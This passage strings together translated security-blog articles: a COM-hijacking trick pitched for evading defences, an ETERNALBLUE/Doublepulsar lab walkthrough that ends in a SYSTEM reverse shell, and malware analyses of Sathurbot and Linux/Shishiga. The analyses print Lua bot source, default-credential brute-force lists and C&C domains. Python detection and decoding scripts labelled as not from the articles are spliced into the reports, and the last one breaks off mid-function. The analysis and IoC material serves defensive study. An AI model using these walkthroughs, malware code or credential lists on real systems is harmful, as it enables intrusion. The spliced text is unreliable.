  • /S: the argument for the subsequent call to OLE32!CoInitializeEx;
  • /C: the CLSID;
  • /I: the interface ID;
  • /X: the parameter value needed when calling OLE32!CoCreateInstance;

It then invokes the COM component through the following calls:

Call OLE32!CoCreateInstance

Call ppv->QueryInterface

Afterwards it calls

ppv->Release()

CoUninitialize()

and then the function returns normally; when it returns normally, the exit code of verclsid.exe is 0, which guarantees that our DLL is loaded successfully.

So all we need is to write a COM server DLL whose interface returns S_OK when verclsid.exe calls it. For details on writing the COM server DLL, see the attachment link.

Attachment download: https://pan.baidu.com/s/1mijwuTE password: sshr

Summary

The biggest advantage of this COM hijacking technique is that no dynamic DLL injection is required, so it bypasses proactive defence; furthermore, the loading process is the operating system's own verclsid.exe, a naturally trusted process, so whitelisting can be bypassed as well, and the loading of the hijacked DLL is determined by low-level system mechanisms. This technique could very well be used by cybercrime, which demands that security vendors improve their recognition and detection of this hijacking behaviour.

China Hacker Cloud on the Firefox pentesting toolkit Firefox Security Toolkit (use the translate function when using it!)

Implementation
It downloads the important extensions and installs them in the browser. After surveying the information security community, I picked a set of useful extensions and wrote the Firefox Security Toolkit. It can also download the Burp Suite certificate and a user-agent list for the User-Agent Switcher add-on. With a single click you get a web application testing browser.

Differences from OWASP Mantra and Hcon STF
OWASP Mantra and Hcon STF are not updated regularly, and developing and maintaining them takes a lot of work. With Firefox Security Toolkit I only fix issues and bugs when needed; no other maintenance is required. The extensions used are the latest versions downloaded from Mozilla's Add-ons store, giving penetration testers the best possible experience.

Target users
Web application penetration testers, information security researchers, and anyone else interested in web application security.

Compatibility
The project currently supports Linux/Unix environments.

Download address: download link

Available add-ons:

Cookie Export/Import
Cookie Manager
Copy as Plain Text
Crypto Fox
CSRF-Finder
Disable WebRTC
FireBug
Fireforce
FlagFox
Foxy Proxy
HackBar
Live HTTP Headers
Multi Fox
PassiveRecon
Right-Click XSS
Tamper Data
User Agent Switcher
Wappalyzer
Web Developer

Extra features:

Downloads a user-agent list for use with User-Agent Switcher

China Hacker Cloud: reproducing the Equation Group ETERNALBLUE remote overflow vulnerability, with a port-443 exploitation tool

The Equation Group leak has been all the rage lately. At readers' request I went through the file tree on GitHub and located the exploit files. They mainly attack the SMB and RDP protocols of Windows hosts; using the payload programs they provide, the two modules Eternalblue and Doublepulsar can attack the SMB and RDP protocols.

1. Environment setup

win2003 attacking machine: ip 192.168.0.28
kali attacking machine: ip 192.168.0.27
win7 target: ip 192.168.0.14

PS: run netstat -an to check which ports are open and make sure port 445 is open.

Also, the win2003 attacking machine needs a Python environment: install python-2.6.6.msi and pywin32-221.win32-py2.6.exe (the installation steps are not repeated here), then adjust the system environment variables once installation is complete.

Equation Group ETERNALBLUE download: www.hackerschina.org (click to download). After downloading and extracting, copy all files from the windows directory to the win2003 system.

Inside that windows directory create a folder named listeningposts, matching the name used in fb.py.

2. Test procedure

Enter the windows directory and run python fb.py. Set the target IP and the local IP, and choose No for redirection; because my VM has no D: drive, I changed the logs directory to the C: drive.

Following the prompt, enter 0 to create a new project, named test.

Next run use Eternalblue and press Enter through the prompts:

Note: at this prompt choose option 1 as indicated, then keep pressing Enter.

In Kali, generate a DLL hijack file with msf and copy the s.dll file to the C: drive of Windows 2003:

Start the msfpayload listener in msf:

Then, back on Windows 2003, run use Doublepulsar.

Select the matching operating system as prompted, choose run DLL, and set the DLL file path.

Finally, in MSF you can see the reverse shell come back, with system privileges obtained.

3. Exploitation tool

PS: the tool is not yet complete; join the group if you need it.

4. Defensive measures

On all Windows hosts, use the firewall to filter or close ports 137, 139 and 445; for remote login on 3389, if you do not want to close it, use the smart-card logon feature.

Sathurbot: Distributed WordPress password attack (HackersChina)

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file, while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim into running the executable, which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted as login:password@domain) to probe for passwords. Different bots in Sathurbot's botnet try different login credentials for the same site. Every bot only attempts a single login per site and then moves on. This design helps ensure that the bot doesn't get its IP address blacklisted by any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used; in particular, the wp.getUsersBlogs API call is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of client addresses, even against websites that do not host WordPress, are the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.

Our examination of logs, system artifacts and files indicates that the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request and no web browser open; an excess of requests like GET /wp-login.php and/or POST /xmlrpc.php indicates infection. Alternatively, check for the files or registry entries listed in the IoC section below.
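The web admin side of this check can be automated against an access log. The script below is an added example, not code from the article or from ESET; it assumes the Apache/nginx combined log format and looks for the footprint the article describes: many distinct client IPs that each POST to /xmlrpc.php exactly once (one credential per bot per site), plus GET /wp-login.php probes on hosts that answer 404 because they do not run WordPress. The sample log lines are constructed with documentation-range addresses.

```python
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" access-log line (assumed format), e.g.
# 203.0.113.5 - - [10/Apr/2017:12:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Request shapes the article names as the footprint of Sathurbot's WordPress module.
PROBE_KEYS = {("GET", "/wp-login.php"), ("POST", "/xmlrpc.php")}


def parse_line(line):
    """Return a dict with ip/method/path/status for a combined-format line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines, min_ips=5, single_shot_ratio=0.8):
    """Summarise probe traffic per client IP and flag the distributed pattern.

    The distributed signature is many distinct IPs that each POST to /xmlrpc.php
    exactly once, as opposed to one IP hammering the endpoint (which ordinary
    per-IP rate limiting already catches).  Thresholds are this example's choice.
    """
    hits = defaultdict(Counter)   # ip -> Counter of (method, path)
    wp_login_404 = set()          # IPs probing wp-login.php on a host that lacks it
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["method"], rec["path"])
        if key in PROBE_KEYS:
            hits[rec["ip"]][key] += 1
            if key == ("GET", "/wp-login.php") and rec["status"] == 404:
                wp_login_404.add(rec["ip"])
    xmlrpc_ips = [ip for ip, c in hits.items() if c[("POST", "/xmlrpc.php")] > 0]
    single_shot = [ip for ip in xmlrpc_ips if hits[ip][("POST", "/xmlrpc.php")] == 1]
    distributed = (len(xmlrpc_ips) >= min_ips
                   and len(single_shot) >= single_shot_ratio * len(xmlrpc_ips))
    return {
        "probing_ips": sorted(hits),
        "xmlrpc_ips": sorted(xmlrpc_ips),
        "single_shot_ips": sorted(single_shot),
        "wp_login_404_ips": sorted(wp_login_404),
        "distributed_pattern": distributed,
    }


# Constructed sample: six bot IPs with one login attempt each, one legitimate client that
# uses xmlrpc.php repeatedly, one unrelated visitor, and one malformed line.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2017:12:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2017:12:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.17 - - [10/Apr/2017:12:00:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.17 - - [10/Apr/2017:12:00:06 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Apr/2017:12:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Apr/2017:12:00:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [10/Apr/2017:12:00:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.201 - - [10/Apr/2017:12:00:20 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.140 - - [10/Apr/2017:12:00:25 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Apr/2017:12:01:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/4.7"
10.0.0.8 - - [10/Apr/2017:12:02:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/4.7"
10.0.0.8 - - [10/Apr/2017:12:03:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/4.7"
10.0.0.9 - - [10/Apr/2017:12:04:00 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
this line is not in combined format
"""

if __name__ == "__main__":
    result = analyse(SAMPLE_LOG.splitlines())
    for k, v in result.items():
        print(f"{k}: {v}")
```

Run it against a real log with `analyse(open("access.log").readlines())`; the single-shot ratio is what separates the botnet from a lone brute-forcer, so tune `min_ips` to the site's normal traffic before alerting on it.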

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager, find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected .DLL, and reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

The DLL runs in the context of the rundll32.exe or explorer.exe process and locks its files and registry keys against editing. The installer carries both 32-bit and 64-bit versions of it.

Subfolders of the above (contain the files seeded via torrent):
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries vary across samples and have 6-character subkeys; their content is of binary type and encrypted, and is used to store variables, temporary values and settings, IPs, C&Cs and the UID.

For example, {GUID2} entries look like:

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001


Linux/Shishiga malware using Lua scripts

Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.

How to Meet Shishiga?

Linux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak credentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to bruteforce SSH credentials too. Here is the complete credentials list at the time of writing:

bftelnet.lua
[...]
local accounts={
    {"admin","admin"},
    {"root","root"},
    {"adm","adm"},
    {"acer","acer"},
    {"user","user"},
    {"security","security"}
}
[...]
bfssh.lua
[...]
local accounts={
    {"admin","admin"},
    {"root","root"},
    {"adm","adm"},
    {"ubnt","ubnt"},
    {"root",""},
    {"admin",""},
    {"adm",""},
    {"user","user"},
    {"pi","pi"},
}
--[[
    {"acer","acer"},
    {"security","security"},
    {"root","toor"},
    {"root","roottoor"},
    {"root","password"},
    {"root","test"},
    {"root","abc123"},
    {"root","111111"},
    {"root","1q2w3e"},
    {"root","oracle"},
    {"root","1q2w3e4r"},
    {"root","123123"},
    {"root","qwe123"},
    {"root","p@ssw0rd"},
    {"root","1"},
    {"root","12"},
    {"root","123"},
    {"root","1234"},
    {"root","12346"},
    {"root","123467"},
    {"root","1234678"},
    {"root","12346789"},
    {"root","123467890"},
    {"root","qwerty"},
    {"root","pass"},
    {"root","toor"},
    {"root","roottoor"},
    {"root","password123"},
    {"root","password123456"},
    {"root","pass123"},
    {"root","password"},
    {"root","passw0rd"},
    {"root","1qaz"},
    {"root","1qaz2wsx"},
    {"root","asdfgh"},
    {"user","user"},
    {"user",""},
    {"acer","acer"},
    {"security","security"},
    {"root","passw0rds"},
]]
[...]

We found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian), ARM (armv4l), i686, and also PowerPC. These are common for IoT devices. We think that other architectures like SPARC, SH-4 or m68k could be supported as we will explain later.

Shishiga’s skills

Linux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have trouble unpacking these binaries because Shishiga adds data at the end of the packed file.

After unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.

$ file unpacked.i686.lm
unpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped

Once executed, the binary will initialize the malware Lua module with the following methods:

Malware methods
malware_module_methods  dd offset aGetver       ; "getver"
                        dd offset getver
                        dd offset aGetos        ; "getos"
                        dd offset getos
                        dd offset aGetarch      ; "getarch"
                        dd offset getarch
                        dd offset aGetmacaddr   ; "getmacaddr"
                        dd offset getmacaddr
                        dd offset aGetmods      ; "getmods"
                        dd offset getmods
                        dd offset aSetargs      ; "setargs"
                        dd offset setargs

The getmods method returns the archive blob, as we will explain later. Then hardcoded Lua code (malware.lua) is executed via the luaL_loadstring and lua_pcall functions. The Lua code is quite straightforward, but here is a quick walkthrough of the source code, without any modifications on our part.

malware.lua
local unistd=require("posix.unistd")
require("malware")

function getexe()
    local fn=unistd.readlink("/proc/self/exe")
    if fn==nil and arg~=nil then
        fn=arg[0] --symlink removed
    end
    if fn==nil then
        print("couldn't find bot file")
        return nil
    end
    local file=io.open(fn,"r")
    if file==nil then
        print("couldn't find bot file")
        return nil
    end
    local data=file:read("*all")
    file:close()
    return data
end

function getMods()
    return zlib.inflate()(malware.getmods())
end

function getScriptFiles(scripts)
    local files={}
    local i=1
    while true do
        local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)
        if a1==nil then
            break
        end
        local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)
        if a2==nil then
            break
        end
        if c1~=c2 then
            return nil
        end
        local src=string.sub(scripts,b1+1,a2-1)
        i=b2+1
        files[c1]=src
    end
    return files
end

malware.exe=getexe() -- (1)
local modules=getScriptFiles(getMods()) -- (2)
[...]
f=load(malware.modules['main.lua']) -- (3)
local s,err=pcall(f)
if s==false then
    print(err)
end
(1) open the malware executable file via /proc/self/exe and return its content;
(2) retrieve the zlib archive via the getmods method, decompress it, parse it using the begin/end tags and store the scripts in a Lua table;
(3) call the main.lua module;

There is an exhaustive list of all Lua scripts found in the IoCs section. Most of them have self-explanatory filenames, but here is a brief summary of some of them.

callhome.lua

  • retrieve the configuration file server.bt or servers from config.lua;
  • if unable to reach the current default server, change to a different server;
  • send files (reports or accounts, both JSON formatted);
  • execute tasks from task list retrieved from the C&C server;

bfssh.lua / bftelnet.lua

  • module to bruteforce SSH and Telnet logins;
  • check if the command echo -en "\\x31\\x33\\x33\\x37" outputs 1337; if not, exit, else continue;
  • device architecture is determined from the /bin/ls file by running cat /bin/ls and parsing the ELF header, see below;
  • spread the malware (both .lm and .dm files) according to the device architecture;
  • save successful credentials;

The architecture checking code is as follows:

bfssh.lua, getArchELF method
function bfssh.getArchELF(text)
    local bits,denc,ver,ftype,farch
    if text==nil then
        return nil
    end
    local i=text:find("\x7fELF") -- (1)
    if i~=nil then
        bits,denc,ver=string.unpack("<BBB",text:sub(i+4))
        if denc==1 then
            ftype,farch=string.unpack("<HH",text:sub(i+16)) -- (2)
        else
            ftype,farch=string.unpack(">HH",text:sub(i+16))
        end
    end
    return bits,denc,farch -- (3)
end
(1) every ELF file has to start with \x7fELF
(2) ftype, which represents e_type (ELF file type: executable, shared, etc.), is not used
(3) bits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA] (little or big endian), and farch represents e_machine in the ELF header
bfssh.lua, getArchName method
function bfssh.getArchName(bits,denc,farch) -- (1)
    if farch==0x8 and denc==1 then -- (2)
        return "mipsel"
    end
    if farch==0x8 and denc==2 then
        return "mips"
    end
    if farch==0x28 then
        return "armv4l"
    end
    if farch==0x2 then
        return "sparc"
    end
    if farch==0x2a then
        return "sh4"
    end
    if farch==0x4 then
        return "m68k"
    end
    if farch==0x14 then
        return "powerpc"
    end
    if farch==0x3 or farch==0x7 or farch==0x3e then -- (3)
        return "i686"
    end
    return nil
end
(1) bits is not used
(2) check if the file is for MIPS little endian (e_machine == EM_MIPS and e_ident[EI_DATA] == ELFDATA2LSB)
(3) check if the file is for Intel 80386, Intel 80860 or AMD x86-64 (e_machine == EM_386 or e_machine == EM_860 or e_machine == EM_X86_64)

config.lua

  • contains publicKey to verify the signature of the binary (.lm or .dm);
  • contains bootstrap nodes list;
  • contains filenames of .bt files, port numbers of SOCKS and HTTP server;
  • contains IP address of the server (probably C&C server);

persist.lua

  • persistence method depending on the privilege (root or user)

scanner.lua

  • used to generate random /16 networks that are not local

worm.lua (this script was removed in the latest version of Linux/Shishiga)

  • allows scanning on a given port;
  • allows upload;
  • gets information from the new infected server;

The readme.lua script has a message banner that grabs your attention, if you speak Russian:

           ВСЁ ИДЁТ ПО ПЛАНУ
А при коммунизме всё будет заебись
Он наступит скоро — надо только подождать
Там всё будет бесплатно,
там всё будет в кайф
Там наверное вощще не надо будет (умирать)
Я проснулся среди ночи и понял, что -
           ВСЁ ИДЁТ ПО ПЛАНУ

This translates to:

            EVERYTHING GOES ACCORDING TO PLAN
When we get communism it'll all be fucking great.
It will come soon, we just have to wait.
Everything will be free there, everything will be fun.
We'll probably not even have to die.
I woke up in the middle of the night and realized
            EVERYTHING GOES ACCORDING TO PLAN

It seems that the malware author was inspired by E.Letov and his album Everything goes according to plan – see the last verse of the title song.

Over the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition of testing modules, removal of redundant files, but nothing especially noteworthy.

While the main binary is named <architecture>.lm, we also managed to retrieve binaries named <architecture>.dm – a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses), port 2015. One of the small changes was in the name of this backdoor binary: it changed from .dl to .dm.

Shishiga communication

Linux/Shishiga can communicate using any of the modules httpproto.lua, btloader.lua or server.lua. The httpproto.lua module has functions that encode or decode the given data and make HTTP POST and GET requests. The source code below shows the process of encoding data.

httpproto.lua
[...]
function httpproto.encode(data)
    local msg=bencode.encode(data)
    local c=zlib.crc32()(msg)
    local k=string.pack("<I",utils.random())
    return k..crypto.rc4(k,string.pack("<I",c)..msg)
end
[...]

btloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from the nodes.cfg file. It also retrieves its configuration data from the {server,update,script}.bt files (in Bencode format) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution of a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown as Python dictionaries.
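Both the httpproto.encode() routine shown above and the bencoded .bt control files described here are small enough to reproduce for traffic and artifact analysis. The Python below is an added example, not code from the article or from the malware: it mirrors the encoding (key || RC4(key, CRC32(msg) || msg) over a bencoded message) together with its inverse, so a captured POST body can be decoded and its CRC checked, and it decodes a .bt file into its (sha1, filename) entries. Assumptions made here: Lua's string.pack("<I") yields a 4-byte little-endian unsigned integer, the crc32 is standard zlib CRC-32, and the sample .bt file is constructed with placeholder sig/k values.

```python
import random
import struct
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def bencode(obj):
    """Minimal bencode encoder: int, bytes/str, list, dict (keys sorted as the spec requires)."""
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, str):
        obj = obj.encode()
    if isinstance(obj, bytes):
        return b"%d:" % len(obj) + obj
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
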